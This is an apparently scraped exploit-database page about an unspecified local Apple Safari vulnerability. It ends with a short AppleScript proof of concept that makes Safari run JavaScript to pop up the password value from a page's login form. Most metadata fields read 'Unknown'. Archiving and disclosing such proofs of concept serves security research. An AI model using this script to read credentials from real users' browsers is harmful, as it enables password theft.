Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Local Vulnerability in Apple Safari - exploit.company
header-logo
Suggest Exploit
vendor:
Safari
by:
Unknown
N/A
CVSS
N/A
Unspecified
CWE
Product Name: Safari
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: a:apple:safari
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Local Vulnerability in Apple Safari

The vulnerability allows attackers to execute arbitrary JavaScript code in the context of the Safari application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23825/info

Apple Safari is prone to an unspecified local vulnerability.

tell application "Safari"
        do JavaScript "alert(document.loginform.password.value)" in document 1
end tell